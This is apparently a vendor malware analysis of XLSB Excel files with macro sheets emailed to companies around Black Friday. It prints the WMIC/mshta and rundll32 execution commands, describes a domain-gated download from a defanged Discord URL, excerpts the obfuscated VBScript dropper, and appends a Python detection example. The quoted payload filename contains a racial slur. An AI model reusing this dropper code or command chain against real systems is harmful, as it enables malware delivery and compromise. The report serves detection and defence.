Distribution of Malicious Excel Files Targeting Companies Amid Black Friday Season

Malicious Excel files are being distributed to companies amid the Black Friday season. The email confirmed today (Nov 25th) was reported by the targeted company in Korea. Attached to the email is an Excel file in the XLSB (Excel Binary) format that contains an Excel 4.0 Macro (XLM) sheet. The macro checks whether the system is connected to a domain controller and only then activates its additional malicious features.

The attached Excel file has a filename of the form 'promo details-[number].xlsb' and is in the XLSB format. XLSB is the Excel Binary File Format, whose structure differs from that of XLS and XLSX files. Unlike XLSX, which is a string-based XML file format (see figure below), XLSB consists of raw binary data, making it harder for analysts, or for anti-malware software with a targeted file-scan feature, to decode its contents. This is not the first time a malicious XLSB file has been discovered. Since files distributed via email have mostly been in the XLS or XLSX format, this trend calls for increased attention going forward.

XLSB file format
Binary file containing the macro sheet in an XLSB file

XML file containing the macro sheet in an XLSX file

Upon opening the Excel file, the following is shown, and clicking the image after enabling macros triggers the embedded malicious features. This design appears intended to evade detection measures such as automated analysis systems. Furthermore, the attacker added 'protection' to the Excel file to complicate analysis: since the macro sheet can only be viewed after entering the correct password, it is safe to say that the malware development process has become even more sophisticated.

When the user clicks the image, the macro creates a malicious file in the ProgramData directory and runs it via WMIC. The created file is a VBScript file disguised as an RTF file, and it is executed by the mshta.exe process.

Command line: wmic process call create "mshta C:\ProgramData\cbfyx.rtf"

The executed VBScript contains the following code (partial). Its main features are as follows:

  • To check the domain controller connection, uses WScript.Shell to read the system's %USERDOMAIN% and %LOGONSERVER% environment variables
  • If the domain controller connection is not confirmed, does not run the remaining features
  • If the domain controller connection is confirmed, connects to hxxps://cdn.discordapp.com/<omitted> and downloads a malicious DLL file
  • The downloaded malicious DLL file is saved under the filename nianigger.bin in the ProgramData directory
  • Runs the malicious DLL via the Rundll32.exe process: rundll32.exe C:\ProgramData\nianigger.bin DllRegisterServer
<script type="text/vbscript" LANGUAGE="VBScript" >
' Builds the rundll32 command line ("rundll32.exe C:\ProgramData\nianigger.bin DllRegisterServer"); every Chr(N+1-1) is simply Chr(N)
G_Q_w_i_Y_t_S_V_Y_W_n_K_s_i_F = "ru" & "" & Chr(110+1-1) & "dll" & "32." & "ex" & Chr(101+1-1) & Chr(32+1-1) & Chr(67+1-1) & ":\\" & Chr(80+1-1) & "ro" & Chr(103+1-1) & "ra" & "mDa" & "" & "ta\" & Chr(110+1-1) & "ian" & Chr(105+1-1) & "gge" & Chr(114+1-1) & ".bi" & "n D" & Chr(108+1-1) & "lR" & "egi" & "ste" & "rS" & "er" & "ve" & "" & Chr(114+1-1)
' Creates "MSXML2.ServerXMLHTTP.6.0", used for the download
Set Q_o_b_k_v_e_J_u_V_s = CreateObject("" & "MSX" & "" & Chr(77+1-1) & "L2." & "" & "Se" & "rve" & "rXM" & Chr(76+1-1) & "HT" & "TP." & "" & "" & "" & Chr(54+1-1) & Chr(46+1-1) & Chr(48+1-1))

' Creates "WScript.Shell"
H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k = Chr(87+1-1) & "" & "scr" & Chr(105+1-1) & "" & "" & "" & "pt." & "Sh" & Chr(101+1-1) & "" & Chr(108+1-1) & "" & Chr(108+1-1)
Set W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z = CreateObject(H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k)
' Reads %USERDOMAIN% and %LOGONSERVER% (backslashes stripped, lower-cased) for the domain controller check
w_g_x_q_b_O_S_y_G_g_w_c = LCase(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.expandenvironmentstrings("%USERDOMAIN%"))
e_K_l_a_I_l_c_E_t = LCase(Replace(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.expandenvironmentstrings("%LOGONSERVER%"), CHR(92+1-1+1-1), ""))
' Creates "Scripting.FileSystemObject", used to write the downloaded file
Set q_h_H_U_O_o_S_q = CreateObject("" & "" & Chr(83+1-1) & "" & "cri" & "pt" & "ing" & Chr(46+1-1) & "" & Chr(70+1-1) & "ile" & Chr(83+1-1) & Chr(121+1-1) & "" & "ste" & "mOb" & "" & "je" & Chr(99+1-1) & Chr(116+1-1))
</script>

To summarize, the email and the malicious Excel file found this time are malware that targeted a specific company. It is estimated that similar attacks using XLSB files may continue even after the Black Friday season ends.
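As an added defender-side example (not part of the report), the Python below runs three process-creation checks modelled on the execution chain described above: WMIC launching mshta, mshta executing a non-HTA file from ProgramData, and rundll32 loading a non-DLL module. The events are constructed samples, and "payload.bin" stands in for the .bin filename named in the report.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry. The first
# three reproduce the chain in this report: WMIC launching mshta on a .rtf in ProgramData (the
# child's parent is WmiPrvSE.exe, hence the unrelated ppid), then rundll32 loading a non-DLL
# ".bin" with DllRegisterServer. "payload.bin" is a placeholder; the last two events are benign.
EVENTS = [
    {"pid": 4102, "ppid": 3990, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": r'wmic process call create "mshta C:\ProgramData\cbfyx.rtf"'},
    {"pid": 4120, "ppid": 716, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta C:\ProgramData\cbfyx.rtf"},
    {"pid": 4133, "ppid": 4120, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\ProgramData\payload.bin DllRegisterServer"},
    {"pid": 4150, "ppid": 3990, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta "C:\Program Files\Vendor\setup.hta"'},
    {"pid": 4160, "ppid": 900, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

PROGRAMDATA = re.compile(r'(?i)[a-z]:\\programdata\\')
HTA_EXT = (".hta", ".htm", ".html")


def check_event(ev: dict):
    """Return the name of the rule an event triggers, or None."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd, low = ev["cmd"], ev["cmd"].lower()
    if image == "wmic.exe" and "process call create" in low and "mshta" in low:
        return "wmic_spawns_mshta"            # WMI used as a proxy launcher
    if image == "mshta.exe" and " " in cmd:
        target = cmd.split(None, 1)[1].strip('"')
        # mshta ignores the extension: a non-HTA argument, or a script under ProgramData, is suspect
        if PROGRAMDATA.search(target) or not target.lower().endswith(HTA_EXT):
            return "mshta_non_hta_target"
    if image == "rundll32.exe" and " " in cmd:
        module = cmd.split(None, 2)[1].strip('"').split(",")[0]
        if not module.lower().endswith(".dll") or PROGRAMDATA.search(module):
            return "rundll32_non_dll_module"  # e.g. a .bin loaded via DllRegisterServer
    return None


def scan(events: list) -> list:
    """(pid, rule) for every event that matches one of the three checks."""
    return [(ev["pid"], r) for ev in events if (r := check_event(ev))]


if __name__ == "__main__":
    for pid, rule in scan(EVENTS):
        print(pid, rule)
```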

[File Detection]
Downloader/XLS.Generic
Trojan/Win.FJX

[Behavior Detection]
Execution/MDP.Behavior.M3819

[IOC]

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
